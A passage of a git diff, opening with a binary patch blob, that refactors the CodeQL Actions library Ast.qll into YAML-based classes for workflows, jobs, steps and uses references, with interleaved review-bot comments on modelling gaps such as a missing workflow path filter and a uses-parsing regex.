zs)@(VK#{21nBfHr-{uNi+*q&M!j~MPWOG735w#}dKO8n-TKulwW%?@pf4O%8!5+VxHr3n5}Z$C4AqNjycwzg8-t1w#oIp_&f6LR71x5hg_Ba`x?w(>yQHd0!0>U92RK z@&4ue_oLpv{r0nK1?_z(3mlOW0*a;BCf(*tjw>ilxp1vLmoxw#1raxILNQ!p#JNLm zRCv+E)Xnmo?{s#!V&3qm$7L|ugMp5{a-g-_#PN*1Z>!1$w6SWa-t)1R(%~xJscKPN znI2ZiCVY#;2`$AHS1gVz{>0@?tV!)r_M=ro5W-oT3dJPspiWMO?~}W- zGJI)cq5CkgPn)$UDUBUt8@0(cx4GHQSIo|}@+H0;>24x|m5}XTX-%h_UG;G@$uhpC z&)&d-nZ`zXL|WPG0#XNvD=*361Z<&IH!TD?S~XU2c|{8l4&xlGq+P@A{TfSGYQ-(N zzyj`{*)CzD8ex0eSQ~?an=({@Vi}+wYFmB;5W})@>xIK8-G{G~$*>AHxN315lDc@ol493TsaDnxQP=6@>;;w1AF&;{Y}=~s&v>|#{mcPS%7@c&onzWc$3~q!o&&KNXFv6q_W1i zMO7m?q8|$1@idXFt&}=O2X*W&bghQ#eoj$k+J##fSJswO*|6@N*Ou&NWRQ|0>A35U z?isp^`D${Ia`YDDZ-tjKqh9(>vbn7)*2-MG4Kf3E$EMsP)C7u}9pW@;r>3i&I;PVNGU z=#Uuy?{gli2?d~X;L|I*5YPg1Mk_4VRvn%yOc(5&Z?{rfGJuG#%O5tEwj)Q`DyC}j z+K@V}vQR6M7pMgdHLbShsJ>2FoKR+runaFB`|I#7WoOQW5EY{)I)&w_iVQ4I+L#ys zu4vlU7fDyz82y`YPoVo=eY%XzJYvFaXbg&nD>ExfT?+SogGOWviYns8ea1g3LFQoyVRu`noZBR9FG%f z-;d)N!h;+h2(|b3O1B<2R~CJ45`o`Ic{`%I7Jj4LGPfCEzjooSF0WMP`*o}&51)Rz zh(#L>(*zAqw)A>HKMn?ZA9aitTVBdi3lx6!UQ20DCjlxyKw0ER0n%bb5P##V{UplW zefX7v6Ty~Cah!qu`RbKCgv;@U<@=BGxbI!FE|4BKI1iSnYbGcVkYTic^9INKxWN@E zOa5&-mFtRyzAqoS&_R;*GQoRf+0$uAFwohllok0*d<=O355_&dZ& zh>qlF6jK=AM@1PPhD-RTBYkWc6wYdBKG>NCuoE`E^=&>V)`1f#NL=uoR|DztgP@Cx zU`4M0`Ft4f?~7^R<;jOW)S2`-$q>9RMQUMG2!hC(_`(20=1l>^Jt(RuJ4Mb6y(cnt zCQGbOQcp0I-{BZUnzB#hd%Z9XNM@h)4+gD@fh9xaFD4{aP$grlgk$K{W)_u66RDb& zGT`ATc#vyu_sSR`Phr41Dg)K-;a`X=#Sxpl#}0@Or5EWgi*K^Y&UnvPfF3t!;}5|; zh)}MZf=yvGU|M!&IZW@`9U&CLv8td)qRPuEdKko7^W94$xW^SQfVJWh3BE4PfHVD+U?N8Cq{YM{{2~W3aziu+3_V>^N&$nqC{rww!yZN{ z<05`2Mu!F1$*MGsy1A=4j|#^s3y1Tb8a7X%ObxFA^#ffg6atK|(Lp)NlmmP$B~i?= zl6?>?wu~fE5ndHRI!z=S!e~s=*h@{ad}AL1 z1+-Ig9<0$MW8;u66^d8+sp(Cq_b;cQgmo{NLyQn_q;W35-YAoY8=kt|3$Ns>7jfpY zy~YFaW&qh3IEv~k^{fHz<(pJb8S_*5;&{A%Q^sfzb!ToRKyxZmv{`RE_HH2G@)YPa zlQ9bA1s@(53urPLNp?Q2`PR_Do1UtX>XxkOQD4KuTMkeM6;{U=${Vg7UTeclwm-$| zDGCb8sVuPD5ueNG3`1!SjRc#)S`1{1{9Oc9%Z zfa4n3-eH88iU&+0f{vrzP;7#$DP*UsnhLr;}iuB zhh}Lws&I1i$!|c#Iwl;&uq 
zZ)U$W^feemb20e0>V_<9_qzO0@%Wyuwn0=kr;v&{V0jxq2|&3g4Qe3RXzbdq&28yM zOrEFhXl{HA$fO7>QcDmZAg1tt3&?)Ym$Wx9vDLS?wS6$CAA@pi7$c$&1H$|BlooJQ zc^l6eDCjSu?|0#*W2xI_#W$MzE>7o0um%|3&=ybm3Od1=B7!Isw8`aS{g`^wv{fjJ zI6M54n=U$XDrj`0$m6vGeL6>IYgKcWs=dSsNtGSXOS3BEoogq0!NkUft6$EXoFUJE z<-^zi_VD`eu146ufgtS%m;ceE`$g0sBiw_R3OO{JJ0#O(K-3gZRZ3CSx;?DDrINF@7<2m~ZCwrUQ`>UF=G;wyFwWzA zxCKgt=kS-GMoCgY68Au$>0dqJkI$z(6AN7zH)f1agefd`)%L=Tbs$y31zP4JG4^Is{)Zth?gZIlDo) zhYX01FKwz7S=i4eG_w7{5OqX7{tKemuoXSdL6wxbmN&=Nb_QU^y9W)*k4qm#9W?UtL9xaUo63KWm%h)a z+K2Ke8(LGK-lJ6g9lTigV9Ib^yg~(Tyup8^JACebBnu^hToQiyL z%?|8{U4~d&Wqb5p`N6d*IsaDY;gq0j*l)Bm!uQ5Zayf)69xmNhx+@NNBbNBGVXc? zj^;fU7T&GE=$EUSf`Zk)4w@>=;E6yVSzO4=((>uC<*#eeUeZP3ku&CiK9})|@TAWj z+N>XOUec)CEm3oh9JgkQ_#7PE6Wd8fed?2K7~a*q(+yE6|7nuqeseULGO$+;Vi@UJ zYcJmrNcYO>%r24fv(vA1rLFpl2F{1M{`S}U3GZi|>&I%9huR|DhoBVE4EHe8{`+s= zBl@JBfPP4nts8P+Cy=BG{o$Bi>NDJ$!U2(~eMjzrfN7ZNn~m;2M(sH)JaPR+!RjX) zwozIX^EW*md6iaXS6{b57P3-W)qGbwayWJgStR*;t8XHy+K47W2$iPbG*l7c&YdfA z3)ybk6x~>iZ#R+0T7EKN*7BBV+6IJFPwe}D@V?|!TsK(fJY>v4>~4RxwX(e^l3WRV zTtJlud7e2Bl%4%G?0Y>QsTR6+HYQHLR*$?SaFhYLVO<#k(!}H?G&OQwBz5H$s24Tz zl8R#Nn?!RBd@iRB`00=L1LO`4KMC_}M7WRV`s&|=kMJm2SuNt-xWleT@@SY=2fO$| zzhBf;1VMzDa~svLb;PZi{$K*ZKw}TzWwy z4Jjn^+o?D%s6AhQo=bo8jc6z`L4G7^{IIox5=fhTk1!#rd<&=nW_@iVv>tvQ`HIGu zzDc>>A^TTyr8OpD@4Y)agLoO&nJ51 z+4kfPIcADdtw8g?5S0f=5KzgL}7(lricQa081UfrV5v{D1_vcgyT ztlGY74KJ~+y7^q&{loRul`|Hi@TGJ$=l)4%>s9Uo;Ho)Vmx!&sv3J^nZgF6IU#=+r z;3p2-R1#MW+YHIdd_Y4rL=lqB&q~{lqMjMqzTySlT;tKmS845GS$B|+^0FbvMJ{=e zRyg?I;Ezrdi7OL15>vDGbo0im;{Gto7^jUhywHgk^y0j3Rv%(|k$HwH(=?!f?iZ z5DP`zJdT^tqC!&0mtu%RtF=zM%yE59rX&ZnaDOn%)@~PfpojqP_C*Hr*$hL! 
zf_{l3PPFBHp9m2yEQ0uT|5E+X=8E!YkW|_-UT5~asAYcOs-S9yvA;~Pa*7(x9VSh& zBJuM(n8RP0G6q#3`(s65+F!%K^Uu>SGsrDc8u(C-*1ms>E{%qo%a^lTw&z{Z%3_jh z;)pI65A`Fvmx!I=`?Umojvj6#ZnwjY`(S143k)Z>K_;UR1mkE%aq0OW0q*vu9`P@x zaBdJVEOOH{)87>1FTo4>~^T9N2CwSG}{R#k>gs* zZt{+xHZ^KZ;mIo!w=Q+%Yy>&u9B)Sk#dxn65~U_ZHVBoIb|nOkuDr3iQO0N0{kkP$ zd()b%7)r?fXFJiYwCPN^3`amu-5OyCbOR`B*@uDS5AL5C+v5a|*7I5AB4LKj>a@7; zxIXamc~Rl1hz_3H-I%F-{TfzoWKAal%)K0{Co}15V62!$gw=BKN@pCtEQX%avtd7( zPEFmz`C2N;*yr$ryyfu1`$rfjs9a@hYqr^ZuhroJgNp*EI8M6uVRn|(AS`jdrKUp(Q+mAbUuhW_9AC9EZF!laE#03u= zO8%AQ$E(*fRn-3nmY?43bE29NeTWhG_T3=^UZyR8-{63&K*P&GwF4OMu7?uMJ0+zh zN4`&F)B15Q0nKk&E%CI>1fjZ2GEg0M;Ynz2~|}MGtf;{gv>4i>&P) z8X5qh9wE{%zSYwrb($PK{WOZ+^yG&x)Q6A1@RiT>sFH= z$xhNzRs66*3qMeK2lGJtns7EDk}}#kouJgEH{|Tq26;%`+_kG+xVRVD8gpWVwwI_H zNo21%he3?9B~R9R)QKg#=}8|pk_v-Ui~!X(%2zMO==g8p=6(sCjd^dV{(<+_zw++! zoI{<=C=z{~3mE)p!FL?gEY$t(rvpe&7h)!mx1gZ*LI@1dNS8f+abuVwG@qfH zD7eKt?>I}_wQ#2W_C4pDjfD@5g6WJ!v|5Zo1Vh!@FWRx&gbdDjTFUTawrQaO!U}{{ z(~Af(^p|y!mL1X#DHvn-x0MApyeS_#NmT_@5ehFgkK?-%@kFN9CEw`|$-dW8S;f zb;sDe7c^&i^n`%v>wAm{n>hhXQVNisA5HCfIY3`7gKvRst3t~}OlGaYJ?8EN*8#dl zKZXDo%CCtY7bjtetA@^l7C!&=Uh|Bx?y;Zl*QGg1R@#RF-EaO9&?$oGEOr_6?4ey$`@cBe$f|}|B_{m;`;)HijX~TY>eM{-( z4H9P1lei%aE3`kwMnzvl8YT*W`=sjK5i@c@jnL|@fA)qd#H}D5%n>JS2&+uwr-O~I z+qD8ko4W~SaWIV8K~ZtOz2{3N9CDFm#kOPaSpINu!a}w4Fjg-rF17! 
z2hd6Zg*yTg>l0sj2k9z|lz&L*8kt4v#BC-oyV4ZY6m5u;9sD%8k;_KCbsmG!5P%SC zw1f{`W3Tl{LRp&S<|aaD8Rp?9yz@iQsrRpWPpD#`xecPMg8dR-Bibi2x0f!obHSy& zu6@_0Hi;hVW3S)#C<^`^QL~+VI#&PLiC{|Vv^is&3Un*Pm;qHxB?hM)K6X{6wCxoaQ|a00Q>NfZ%n ziaVY%V|9Ylph}d{fa}Iw>HMOYTKVs3;InlaY{Y6iVAZJ|(!MQmPQDypVZ;P5p zPEvEQ8#V&_7rIcZ3gP zlxEQ$$wmilihi`uO8>fVI{t5w{XgxljP(EW{>;VmlnvKOmcF~<8>(@c(?i~}=&YK2hlx?BogE!JdKv7~h@LltpiRd;HO|5Ld7~<) zilBFJufH322!9G~Zdp-k2HMyF#>V5s>uZBYEjD<7L4N4hXu*0>gDnID*^npjJ~g{s zec9qT&>!?h7jLEt!tu4N@ISl$GJqU{?tsw`tn5F${(CC@f0;L?C%joiYMMUq);Vtr z*9_;ZYU|03R0WQ3wbLO+x~7syTkZR!PTHonw3!&W_7R_`eFW5|bdRgZi5a-_RWXOD~)jB}=w5^IxW1-*W% z#HDP3!B%Jr!ESG}D&s^dA9u@$C4tEkCM>Kj-Y=s1=-Lb+FSoyJj0B2u3w^R4$pWlO zcpECmX)K0kH1I5BOaPIp@g&G?IUJp2)pOI@?~KmyX7-^3Lz2xU=`n!Wo(@|-6c%ZR z_8XYt4*5DsS-`zQOh5Zm=mVcd3K*7*Kem8DEZOwgb-2Ufyrc394YU7p>|0nRL zZK{u*!@mdn!`gl(;Qvn_@t>%lwt4;&_3A_Te=gKdTRR_v(4VNEwo^W~RsJ68kpB+U zPa9JIME|ss-Rn2>ho}69^1tWe{QqwN{S)rfy2O9N-9dR?xW6tCf5LrQwewH7{n*b7 z_gCrUpKzbn&^(qB{T^C`&j$COg++ftep=){0aAI!N6lN%kObX@@#PbTWQOm;Ga6+k2MXy$5-;_1OK$b;ZMX*?d8Yp$nTL% z@qCDX`}BX}ed<^KQ_Tmjo(=DB3;a*GPi?zLbME($rhYcKPc79y0Y9~z{t5W}^>YLM zk9*%!_vXLH-2$G{gPRNFB`lY+#>Q41eN%nt}Z%UM$vU#`_-w$Gu|2Nt9C&;IX knty`4;`(0&`82a8BM$j+O$GtMefVKQ1p%q%dHn7F1A{ntPyhe` literal 0 HcmV?d00001 diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cb561fdf8d1..096f3b9f803 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -1,4 +1,4 @@ -private import codeql.actions.ast.internal.Actions +private import codeql.actions.ast.internal.Yaml private import codeql.Locations /** 
@@ -23,78 +23,142 @@ class AstNode instanceof YamlNode { /** * Gets a environment variable expression by name in the scope of the current node. */ - Expression getEnvExpr(string name) { - exists(Actions::Env env | - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - | - env.(Actions::StepEnv).getStep().getAChildNode*() = this + StringLiteral getEnvVar(string name) { + exists(Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | + env.(StepEnv).getStep().getAChildNode*() = this or - env.(Actions::JobEnv).getJob().getAChildNode*() = this + env.(JobEnv).getJob().getAChildNode*() = this or - env.(Actions::WorkflowEnv).getWorkflow().getAChildNode*() = this + env.(WorkflowEnv).getWorkflow().getAChildNode*() = this ) } } +/** A common class for `env` in workflow, job or step. */ +abstract class Env extends AstNode instanceof YamlMapping { } + +/** A workflow level `env` mapping. */ +class WorkflowEnv extends Env { + Workflow workflow; + + WorkflowEnv() { workflow.(YamlMapping).lookup("env") = this } + + /** Gets the workflow this field belongs to. */ + Workflow getWorkflow() { result = workflow } +} + +/** A job level `env` mapping. */ +class JobEnv extends Env { + Job job; + + JobEnv() { job.(YamlMapping).lookup("env") = this } + + /** Gets the job this field belongs to. */ + Job getJob() { result = job } +} + +/** A step level `env` mapping. */ +class StepEnv extends Env { + Step step; + + StepEnv() { step.(YamlMapping).lookup("env") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } +} + /** - * A composite action + * A custom composite action. This is a mapping at the top level of an Actions YAML action file. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. 
*/ -class CompositeAction extends AstNode instanceof Actions::CompositeAction { - Runs getRuns() { result = super.getRuns() } +class CompositeAction extends AstNode instanceof YamlDocument, YamlMapping { + //class CompositeAction extends AstNode, YamlDocument, YamlMapping { + CompositeAction() { + this.getFile().getBaseName() = ["action.yml", "action.yaml"] and + super.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } - Outputs getOutputs() { result = this.(YamlMapping).lookup("outputs") } + /** Gets the `runs` mapping. */ + Runs getRuns() { result = super.lookup("runs") } - Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Outputs getOutputs() { result = super.lookup("outputs") } - Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } - Input getAnInput() { this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + + Input getAnInput() { super.lookup("inputs").(YamlMapping).maps(result, _) } Input getInput(string name) { - this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and + super.lookup("inputs").(YamlMapping).maps(result, _) and result.(YamlString).getValue() = name } } -class Runs extends AstNode instanceof Actions::Runs { - Step getAStep() { result = super.getSteps().getElementNode(_) } +/** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ +class Runs extends AstNode instanceof YamlMapping { + CompositeAction action; - Step getStep(int i) { result = super.getSteps().getElementNode(i) } + Runs() { action.(YamlMapping).lookup("runs") = this } + + /** Gets the action that this `runs` mapping is in. 
*/ + CompositeAction getAction() { result = action } + + /** Gets any steps that are defined within this job. */ + Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } } /** - * A Github Actions Workflow + * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. */ -class Workflow extends AstNode instanceof Actions::Workflow { - string getName() { result = super.getName() } +class Workflow extends AstNode instanceof YamlDocument, YamlMapping { + /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ + YamlMapping getJobs() { result = super.lookup("jobs") } - Job getAJob() { result = super.getJob(_) } + /** Gets the 'global' `env` mapping in this workflow. */ + WorkflowEnv getEnv() { result = super.lookup("env") } - Job getJob(string id) { result = super.getJob(id) } + /** Gets the name of the workflow. */ + string getName() { result = super.lookup("name").(YamlString).getValue() } + + /** Gets the job within this workflow with the given job ID. 
*/ + Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + + /** Gets a job within this workflow */ + Job getAJob() { result = this.getJob(_) } predicate hasTriggerEvent(string trigger) { - exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) + exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(trigger)) } string getATriggerEvent() { - exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) + exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(result)) } - Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = super.lookup("permissions") } - Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = super.lookup("strategy") } } -class ReusableWorkflow extends Workflow { +class ReusableWorkflow extends Workflow instanceof YamlMapping { YamlValue workflow_call; - ReusableWorkflow() { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } + ReusableWorkflow() { + super.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call + } Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } - Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } - Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } 
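Review bot: The new `Workflow` class has no characteristic predicate, so every top-level YAML mapping document becomes a `Workflow`, unless `AstNode` (declared outside this hunk) already filters by file. The deleted `Actions::Node` limited modelling to `.github/workflows/*.y(a)ml` and `action.yml`/`action.yaml`, and that filter is not carried over here. Without it, a composite `action.yml` is both a `CompositeAction` and a `Workflow`, and queries built on these classes would report on unrelated YAML files. Consider restoring the path check, e.g. `Workflow() { this.getLocation().getFile().getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") }`. The same applies to `Step` in the `@@ -201,28 +304,38 @@` hunk, whose `parent` is now any `YamlMapping` with a `steps` key rather than a `Job` or `Runs`.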
@@ -118,20 +182,22 @@ class Outputs extends AstNode instanceof YamlMapping { /** * Gets an output expression. */ - Expression getAnOutputExpr() { - this.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = result or - this.(YamlMapping).lookup(_) = result + StringLiteral getAnOutput() { + super.lookup(_).(YamlMapping).lookup("value") = result or + super.lookup(_) = result } /** * Gets a specific output expression by name. */ - Expression getOutputExpr(string name) { - this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or - this.(YamlMapping).lookup(name) = result + StringLiteral getOutput(string name) { + super.lookup(name).(YamlMapping).lookup("value") = result or + super.lookup(name) = result } string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } + + override string toString() { result = "Job outputs node" } } class Permissions extends AstNode instanceof YamlMapping { @@ -148,8 +214,8 @@ class Strategy extends AstNode instanceof YamlMapping { /** * Gets a specific matric expression (YamlMapping) by name. */ - Expression getMatrixVariableExpr(string name) { - this.(YamlMapping).lookup("matrix").(YamlMapping).lookup(name) = result + StringLiteral getMatrixVariable(string name) { + super.lookup("matrix").(YamlMapping).lookup(name) = result } string getAMatrixVariableName() { 
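Review bot: The added `override string toString() { result = "Job outputs node" }` mislabels two of the three users of `Outputs`, which is also returned by `CompositeAction.getOutputs()` and by `ReusableWorkflow.getOutputs()` for `workflow_call` outputs. A neutral label such as `result = "Outputs"` avoids misleading AST and path output. For consistency with the rest of the hunk, `getAnOutputName` could also use `super.maps(...)` instead of `this.(YamlMapping).maps(...)`. The `Outputs` class starts before this hunk.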
@@ -158,28 +224,61 @@ class Strategy extends AstNode instanceof YamlMapping { } /** - * A Job is a collection of steps that run in an execution environment. + * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Job extends AstNode instanceof Actions::Job { +class Needs extends AstNode { + Job job; + + Needs() { job.(YamlMapping).lookup("needs") = this } + + Job getJob() { result = job } + + Job getANeededJob() { + if this instanceof YamlString + then + result.getId() = this.(YamlString).getValue() and + result.getLocation().getFile() = job.getLocation().getFile() + else + if this instanceof YamlSequence + then + result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and + result.getLocation().getFile() = job.getLocation().getFile() + else none() + } +} + +/** + * An Actions job within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ +class Job extends AstNode instanceof YamlMapping { + string jobId; + Workflow workflow; + + Job() { this = workflow.getJobs().lookup(jobId) } + /** * Gets the ID of this job, as a string. * This is the job's key within the `jobs` mapping. */ - string getId() { result = super.getId() } - - /** Gets the step at the given index within this job. */ - Step getStep(int index) { result = super.getStep(index) } + string getId() { result = jobId } /** Gets any steps that are defined within this job. */ - Step getAStep() { result = super.getStep(_) } + Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + + /** Gets the step at the given index within this job. */ + Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } + + /** Gets the workflow this job belongs to. */ + Workflow getWorkflow() { result = workflow } /** * Gets a needed job. 
* eg: * - needs: [job1, job2] */ - Job getNeededJob() { - exists(Actions::Needs needs | + Job getANeededJob() { + exists(Needs needs | needs.getJob() = this and result = needs.getANeededJob() ) @@ -191,7 +290,11 @@ class Job extends AstNode instanceof Actions::Job { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - Outputs getOutputs() { result = this.(Actions::Job).lookup("outputs") } + Outputs getOutputs() { result = super.lookup("outputs") } + + StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + + StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } /** * Reusable workflow jobs may have Uses children 
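Review bot: `Needs.getANeededJob()` resolves a `needs` entry by comparing files (`result.getLocation().getFile() = job.getLocation().getFile()`), although the `Job` class added in this same hunk exposes `getWorkflow()`. Writing `result.getWorkflow() = job.getWorkflow()` states the intent directly and stays correct if one file ever holds more than one YAML document. The nested `if … then … else if … else none()` can then become two disjuncts, one for the `YamlString` form and one for the `YamlSequence` form. The class comment is only a URL; a leading sentence such as `A \`needs\` field of a job, listing the IDs of jobs that must finish before it runs.` would match the other classes. `Job`'s body continues past the hunk.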
@@ -201,28 +304,38 @@ class Job extends AstNode instanceof Actions::Job { * with: * arg1: value1 */ - JobUses getUses() { result.getJob() = this } + UsesJob getUses() { result.getJob() = this } predicate usesReusableWorkflow() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) } - If getIf() { result = super.getIf() } + If getIf() { result = super.lookup("if") } - Permissions getPermissions() { result = this.(YamlMapping).lookup("permissions") } + Permissions getPermissions() { result = super.lookup("permissions") } - Strategy getStrategy() { result = this.(YamlMapping).lookup("strategy") } + Strategy getStrategy() { result = super.lookup("strategy") } + + override string toString() { result = "Job: " + jobId } } /** - * A Step is a single task that can be executed as part of a job. + * A step within an Actions job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. */ -class Step extends AstNode instanceof Actions::Step { - string getId() { result = super.getId() } +class Step extends AstNode instanceof YamlMapping { + YamlMapping parent; - Job getJob() { result = super.getJob() } + Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this } - If getIf() { result = super.getIf() } + /** Gets the ID of this step, if any. */ + string getId() { result = super.lookup("id").(YamlString).getValue() } + + /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ + Job getJob() { result = parent } + + /** Gets the value of the `if` field in this step, if any. */ + If getIf() { result = super.lookup("if") } } /** @@ -232,7 +345,7 @@ class If extends AstNode { YamlMapping parent; If() { - (parent instanceof Actions::Step or parent instanceof Actions::Job) and + (parent instanceof Step or parent instanceof Job) and parent.lookup("if") = this } 
@@ -249,39 +362,54 @@ abstract class Uses extends AstNode { abstract string getVersion(); - abstract Expression getArgumentExpr(string key); + abstract StringLiteral getArgument(string key); + + override string toString() { result = "Uses Step" } } +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * The capture groups are: + * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` + * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. + * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. + */ +private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } + /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class StepUses extends Step, Uses { - Actions::Uses uses; +class UsesStep extends Step, Uses { + YamlScalar uses; - StepUses() { uses.getStep() = this } + UsesStep() { this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = "uses"), uses) } - override string getCallee() { result = uses.getGitHubRepository() } - - override string getVersion() { - result = uses.getVersion() - or - not exists(uses.getVersion()) and - result = "main" + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + override string getCallee() { + result = + ( + uses.getValue().regexpCapture(usesParser(), 1) + "/" + + uses.getValue().regexpCapture(usesParser(), 2) + ).toLowerCase() } - override Expression getArgumentExpr(string key) { - exists(Actions::With with | - with.getStep() = this and - result = with.lookup(key) - ) + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. 
*/ + override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } + + override StringLiteral getArgument(string key) { + result = this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) + } + + override string toString() { + if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" } } /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class JobUses extends Uses instanceof YamlMapping { - JobUses() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } +class UsesJob extends Uses instanceof YamlMapping { + UsesJob() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } Job getJob() { result = this } @@ -297,7 +425,7 @@ class JobUses extends Uses instanceof YamlMapping { override string getCallee() { exists(YamlString name | - this.(YamlMapping).lookup("uses") = name and + super.lookup("uses") = name and if name.getValue().matches("./%") then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) else 
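Review bot: `usesParser()` is `([^/]+)/([^/@]+)@(.+)` and `regexpCapture` must match the whole string, so a step that references an action in a subdirectory (`owner/repo/path@ref`) gets no `getCallee()` and no `getVersion()`. The same holds for local `./…` and `docker://…` references, and this hunk drops both the old `"main"` fallback and the "does not handle local repository references" caveat from the deleted `Actions::Uses`. Queries that key on the callee or on the version pin would silently skip those steps. If the subpath should be ignored, `result = "([^/]+)/([^/@]+)(?:/[^@]+)?@(.+)"` keeps the three capture groups as documented; otherwise widen group 2. Either way the `UsesStep` doc comment should state which `uses` forms yield no result.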
@@ -311,72 +439,73 @@ class JobUses extends Uses instanceof YamlMapping { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | - this.(YamlMapping).lookup("uses") = name and + super.lookup("uses") = name and if not name.getValue().matches("\\.%") then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) else none() ) } - override Expression getArgumentExpr(string key) { - this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result + override StringLiteral getArgument(string key) { + super.lookup("with").(YamlMapping).lookup(key) = result } } /** - * A Run step represents the evaluation of a provided script + * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ class Run extends Step { - Actions::Run scriptExpr; + StringLiteral script; - Run() { scriptExpr.getStep() = this } + Run() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "run"), script) } - Expression getScriptExpr() { result = scriptExpr } + StringLiteral getScript() { result = script } - string getScript() { result = scriptExpr.getValue() } + override string toString() { + if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" + } } -// /** -// * An AST node associated with a Reusable Workflow input. -// */ -// class InputExpr extends AstNode { -// InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } -// } -// -// /** -// * An AST node holding an Env var value. -// */ -// class EnvExpr extends AstNode { -// EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } -// } -// -// /** -// * An AST node holding a job or workflow output var. 
-// */ -// class OutputExpr extends AstNode { -// OutputExpr() { -// exists(Outputs outputs | -// outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or -// outputs.(YamlMapping).lookup(_) = this -// ) -// } -// } -// -// /** -// * An AST node holding a matrix var. -// */ -// class MatrixVariableExpr extends AstNode { -// MatrixVariableExpr() { -// exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) -// } -// } /** - * Evaluation of a workflow expression ${{}}. + * A YamlString part of a YamlSequence or YamlMapping values. */ -class Expression extends AstNode instanceof YamlString { +class StringLiteral extends AstNode instanceof YamlString { + StringLiteral() { + exists(YamlCollection c | + c instanceof YamlMapping and + c.(YamlMapping).maps(_, this) + or + c instanceof YamlSequence and + 